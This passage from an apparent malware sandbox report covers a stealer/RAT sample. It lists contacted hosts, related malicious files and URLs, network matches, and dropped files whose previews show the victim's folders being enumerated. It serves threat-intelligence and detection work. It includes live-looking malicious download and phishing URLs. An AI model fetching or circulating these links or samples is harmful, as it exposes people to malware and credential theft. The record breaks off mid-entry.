pastebin.com | H1XdsfkcgU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.19.24
pastebin.com | w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer | 104.20.3.235
pastebin.com | k43lWDu3AB.exe | malicious | DCRat | 104.20.4.235
pastebin.com | ClientAny.exe | malicious | AsyncRAT, VenomRAT | 104.20.3.235
pastebin.com | qHYHgANDmm.exe | malicious | RedLine, Xmrig | 172.67.19.24
pastebin.com | MzMXVPEjdy.exe | malicious | DCRat | 104.20.3.235
pastebin.com | Resolucion Juridica Bloqueo Cuentas y servicios SRI.vbs.xz | malicious | Unknown | 172.67.19.24
pastebin.com | ubes6SC7Vd.exe | malicious | Unknown | 172.67.19.24
pastebin.com | d43YUxXAW7.exe | malicious | DCRat | 104.20.4.235
pastebin.com | IlWPStOFHj.rtf | malicious | Remcos | 104.20.4.235
api.mylnikov.org | H1XdsfkcgU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.21.44.66
api.mylnikov.org | w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer | 172.67.196.114
api.mylnikov.org | setup.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine | 172.67.196.114
api.mylnikov.org | Hniunx426q.exe | malicious | AsyncRAT, StormKitty, VenomRAT, WorldWind Stealer, XWorm | 172.67.196.114
api.mylnikov.org | SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe | malicious | AsyncRAT, DcRat, StormKitty, VenomRAT | 104.21.44.66
api.mylnikov.org | t3h7DNer1Q.exe | malicious | AsyncRAT, DcRat | 104.21.44.66
api.mylnikov.org | vp2Gd0kDCt.exe | malicious | AsyncRAT, EICAR, RedLine, StormKitty, VenomRAT | 104.21.44.66
api.mylnikov.org | vp2Gd0kDCt.exe | malicious | AsyncRAT, RedLine, StormKitty, VenomRAT | 172.67.196.114
api.mylnikov.org | a.cmd | malicious | Unknown | 104.21.44.66
api.mylnikov.org | UMJLhijN4z.exe | malicious | AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer | 104.21.44.66
icanhazip.com | H1XdsfkcgU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.184.241
icanhazip.com | w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer | 104.16.185.241
icanhazip.com | data-sheet.vbs | malicious | PXRECVOWEIWOEI Stealer | 104.16.184.241
icanhazip.com | Enquiry_-_Dubai.js | malicious | PXRECVOWEIWOEI Stealer | 104.16.184.241
icanhazip.com | wssvZm9dNK.exe | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
icanhazip.com | setup.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine | 104.16.185.241
icanhazip.com | INQUIRY.vbs | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
icanhazip.com | Data-Sheet.js | malicious | PXRECVOWEIWOEI Stealer | 104.16.184.241
icanhazip.com | Order Inquiry.vbs | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
icanhazip.com | Hniunx426q.exe | malicious | AsyncRAT, StormKitty, VenomRAT, WorldWind Stealer, XWorm | 104.16.185.241
api.telegram.org | H1XdsfkcgU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | qRD5vu6vkf.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | 245ad05af518252d59b13d1ce0921595767f112513f7b6fdce647f40535c600b_dump.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
api.telegram.org | Swift 409452623.88 copy.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
api.telegram.org | (PO N 4700001838.pif.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | new contract.exe | malicious | Snake Keylogger | 149.154.167.220
                                                              chromeUpdate.exeGet hashmaliciousUnknownBrowse
                                                              • 149.154.167.220
                                                              4h4b4EWVNU.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                              • 149.154.167.220
                                                              DHL Shipment Document Original BL Invoice Packing List.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: TELEGRAMRU
  1Cvd8TyYPm.exe | malicious | LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT
    • 149.154.167.99
  H1XdsfkcgU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer
    • 149.154.167.220
  w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer
    • 149.154.167.220
  https://telegrambot-resolved.pages.dev/ | malicious | Unknown
    • 149.154.167.99
  project.exe | malicious | RedLine
    • 149.154.167.99
  WR0fuHnEVW.exe | malicious | Vidar
    • 149.154.167.99
  BRWgvKaqbg.exe | malicious | PureLog Stealer, RisePro Stealer, Vidar, zgRAT
    • 149.154.167.99
  qRD5vu6vkf.exe | malicious | XWorm
    • 149.154.167.220
  245ad05af518252d59b13d1ce0921595767f112513f7b6fdce647f40535c600b_dump.exe | malicious | AgentTesla, PureLog Stealer
    • 149.154.167.220
  https://telegrambot-resolved.pages.dev/ | malicious | Unknown
    • 149.154.167.99
Match: CLOUDFLARENETUS
  https://qrco.de/bfBwJl | malicious | Unknown
    • 188.114.96.3
  Urgent PO.exe | malicious | AgentTesla, PureLog Stealer
    • 104.26.12.205
  Factura 422934 pago bbva swift.exe | malicious | AgentTesla
    • 172.67.74.152
  1Cvd8TyYPm.exe | malicious | LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT
    • 188.114.97.3
  ELECTRONIC RECEIPT_Ashleyann.html | malicious | Unknown
    • 1.1.1.1
  H1XdsfkcgU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer
    • 104.16.184.241
  faturas_dsp.qs.pt_Wednesday, June 5, 2024.html | malicious | HTMLPhisher
    • 172.67.196.150
  w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer
    • 172.67.196.114
  4TwN2MkH2l.rtf | malicious | Unknown
    • 104.21.83.128
  QoNAd2x2wy.rtf | malicious | Unknown
    • 104.21.83.128
Match: INT-PDN-STE-ASSTEPDNInternalASSY
  w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer
    • 94.232.249.111
  SecuriteInfo.com.FileRepMalware.3625.5069.msi | malicious | Bazar Loader, BruteRatel, Latrodectus
    • 94.232.249.86
  Form_Ver-14-00-21 (1).js | malicious | Bazar Loader, BruteRatel, Latrodectus
    • 94.232.249.86
  http://85.208.108.63/BST.msi | malicious | BruteRatel, Latrodectus
    • 94.232.249.87
  Form_Ver-13-59-03 (1).js | malicious | Bazar Loader, BruteRatel, Latrodectus
    • 94.232.249.86
  https://firebasestorage.googleapis.com/v0/b/namo-426715.appspot.com/o/PqA45bE7me%2FForm_Ver-11-58-52.js?alt=media&token=dc88189e-81de-49e9-879e-365bc76e3567 | malicious | BruteRatel, Latrodectus
    • 94.232.249.87
  Form_Ver-18-13-38.js | malicious | Bazar Loader, BruteRatel, Latrodectus
    • 94.232.249.86
  jzXBbfutn2.elf | malicious | Unknown
    • 188.247.2.149
  out.x86.elf | malicious | Mirai
    • 188.247.28.128
  bVMuPnsMIq.elf | malicious | Mirai
    • 31.14.164.34
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  Urgent PO.exe | malicious | AgentTesla, PureLog Stealer
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
  Factura 422934 pago bbva swift.exe | malicious | AgentTesla
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
  H1XdsfkcgU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
  w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
  k43lWDu3AB.exe | malicious | DCRat
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
  https://t4ha7.shop/ | malicious | Unknown
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
  http://www.youkonew.anakembok.de/ | malicious | Unknown
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
  http://www.services-nickel.yayra-food.com/ | malicious | Unknown
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
  https://linnil.pwq.workers.dev/ | malicious | Unknown
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
  https://nsfgrs03.pages.dev/ | malicious | HTMLPhisher
    • 104.21.44.66
    • 149.154.167.220
    • 104.20.4.235
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Users\user\AppData\Local\Temp\udwnme.exe
  w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer
Match: C:\Users\user\AppData\Roaming\svchost.exe
  w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):105
                                                                  Entropy (8bit):3.8863455911790052
                                                                  Encrypted:false
                                                                  SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                                  MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                                  SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                                  SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                                  SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                                  Malicious:false
                                                                  Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-8 text
                                                                  Category:dropped
                                                                  Size (bytes):94
                                                                  Entropy (8bit):4.886397362842801
                                                                  Encrypted:false
                                                                  SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                                  MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                                  SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                                  SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                                  SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                                  Malicious:false
                                                                  Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1393
                                                                  Entropy (8bit):5.241470443395582
                                                                  Encrypted:false
                                                                  SSDEEP:24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
                                                                  MD5:7F24357FFA354F2471DED45552B897D7
                                                                  SHA1:1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
                                                                  SHA-256:573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
                                                                  SHA-512:202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
                                                                  Malicious:false
                                                                  Preview:### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):821
                                                                  Entropy (8bit):5.246999163355071
                                                                  Encrypted:false
                                                                  SSDEEP:24:CZksCekV1LFTNkYQAkfAwO8I+bIPjMMPR0YZI5OLcx0gaaFPRYZX:MeeKj+fTOTPAMP1GNR2X
                                                                  MD5:7D272999F3771275B69C5D01FDE300D3
                                                                  SHA1:5A97E296F4D22652712B13E95AAB3765643982BA
                                                                  SHA-256:84FA0C25B878C62D3FA2AFAC34F6BB459FC9C6CE7A26C19932DC22BBA000E308
                                                                  SHA-512:7DFDB802E44E9A794216C3B345F645811FE3F31B295126697EBF16F6BD8C2AB599A81038C551143C45EFF0B40DBE3CF0386BCF95189903198CFA179E7EB7193E
                                                                  Malicious:false
                                                                  Preview:Desktop\...KATAXZVCPS\....KATAXZVCPS.docx....LTKMYBSEYZ.xlsx....RAYHIWGKDI.png....WKXEWIOTXI.mp3....YPSIACHYXW.pdf....ZBEDCJPBEY.jpg...LTKMYBSEYZ\...NIKHQAIQAU\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...RAYHIWGKDI\...SFPUSAFIOL\...SQRKHNBNYN\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....JSDNGYCOWY.mp3....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...Excel.lnk...HTAGVDFUIE.png...JSDNGYCOWY.mp3...KATAXZVCPS.docx...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...YPSIACHYXW.pdf...YPSIACHYXW.png...ZBEDCJPBEY.jpg...zrrHgsDzgS.exe..
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):834
                                                                  Entropy (8bit):5.282690409163236
                                                                  Encrypted:false
                                                                  SSDEEP:24:qZksCeg1LFTNkY+kfAwj9PjM1YZI5OLcx0gaaFPRYZj:0eeijbfThPAaGNR2j
                                                                  MD5:D2A64505CE2CDB3ACC359558743D90D9
                                                                  SHA1:A1C29490252DBF587AE10FA7BA7D9A7947685664
                                                                  SHA-256:8F321EEE94AA42B17CC49846693023D517E193EAB9F5394A06A91C375CA6E0CC
                                                                  SHA-512:02DDACFA7ACD8FF75150D2778F7DB0319E53B7C76E52B4CEA13C58003817355DD8986E6D4646448B3B0BBA6629E44191DA6BF25EB702FF862B00FF4D9A200C7E
                                                                  Malicious:false
                                                                  Preview:Documents\...BPMLNOBVSB\...FENIVHOIKN\...KATAXZVCPS\....KATAXZVCPS.docx....LTKMYBSEYZ.xlsx....RAYHIWGKDI.png....WKXEWIOTXI.mp3....YPSIACHYXW.pdf....ZBEDCJPBEY.jpg...LTKMYBSEYZ\...My Music\...My Pictures\...My Videos\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...SFPUSAFIOL\...SQRKHNBNYN\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png....ZBEDCJPBEY.mp3...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...HTAGVDFUIE.png...JSDNGYCOWY.mp3...KATAXZVCPS.docx...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...YPSIACHYXW.pdf...YPSIACHYXW.png...ZBEDCJPBEY.jpg..
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):338
                                                                  Entropy (8bit):5.287107822500106
                                                                  Encrypted:false
                                                                  SSDEEP:6:3tSLKIyeWrhjWvqj0/m/DvROLXovs0OLPFEKC+PJhr4rmsAnThmyGFNos4hwk4q:QLKPeaiCw/m/zoL4vszLPFEK1h9mmsAf
                                                                  MD5:D9614CBA928B54F7FC5B4C0C735D6B78
                                                                  SHA1:40EEF1EE5AF3AB6E97FD76DD125B936FD92A093C
                                                                  SHA-256:D85AA8C4750E3D5273FA7B69C6989B3A3BD02D392A86B05FAE42D615BCF42AAF
                                                                  SHA-512:2486CF1BB34CD3BF82EBBEE3BC0B12821F9F6F6C3EB35F5C6BE64D1E808CC32D2B025AF2E09DA44EC748B67714B6BF66B34FA2A3BE65F503B673116F3F5C0324
                                                                  Malicious:false
                                                                  Preview:Downloads\...desktop.ini...DVWHKMNFNN.mp3...HTAGVDFUIE.png...HTAGVDFUIE.xlsx...KATAXZVCPS.docx...KATAXZVCPS.jpg...KZWFNRXYKI.png...LTKMYBSEYZ.pdf...LTKMYBSEYZ.xlsx...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.docx...UMMBDNEQBN.pdf...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...WUTJSCBCFX.jpg...YPSIACHYXW.pdf...ZBEDCJPBEY.jpg...ZBEDCJPBEY.mp3..
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.023465189601646
                                                                  Encrypted:false
                                                                  SSDEEP:3:1hiR8LKB:14R8LKB
                                                                  MD5:966247EB3EE749E21597D73C4176BD52
                                                                  SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                  SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                  SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                  Malicious:false
                                                                  Preview:OneDrive\...desktop.ini..
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):88
                                                                  Entropy (8bit):4.450045114302317
                                                                  Encrypted:false
                                                                  SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                  MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                  SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                  SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                  SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                  Malicious:false
                                                                  Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):24
                                                                  Entropy (8bit):4.053508854797679
                                                                  Encrypted:false
                                                                  SSDEEP:3:jgBLKB:j4LKB
                                                                  MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                  SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                  SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                  SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                  Malicious:false
                                                                  Preview:Startup\...desktop.ini..
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4413
                                                                  Entropy (8bit):5.281551820547492
                                                                  Encrypted:false
                                                                  SSDEEP:96:4jzcRPTmt6qESfxLJNebQVuLBYwrbIGV86EdotkTLD8ls6Owq:BtbSJLJ4cUtDUKSiq
                                                                  MD5:76D94AB00A4A774A0D8035B8AACEC7F4
                                                                  SHA1:271376FE2851FC59E37DA9B7E482D4A6C3FAF0C9
                                                                  SHA-256:A4E57D1CA4CBEA4CE2917CA8C5D7BCCC7BE6544696C51A705EF4169995946871
                                                                  SHA-512:A36ECC7791F6F4D5589254DD2CBAC1EDC76CDCB25E6C241923F5DC55C5F1116D3FC4D92DE8037B640A480A2B5F899527FB06302721129689E6F0CC6BA68B1DBF
                                                                  Malicious:false
                                                                  Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.7950885863977324
                                                                  Encrypted:false
                                                                  SSDEEP:3:k+JrLKB:k+JrLKB
                                                                  MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                  SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                  SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                  SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                  Malicious:false
                                                                  Preview:Videos\...desktop.ini..
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
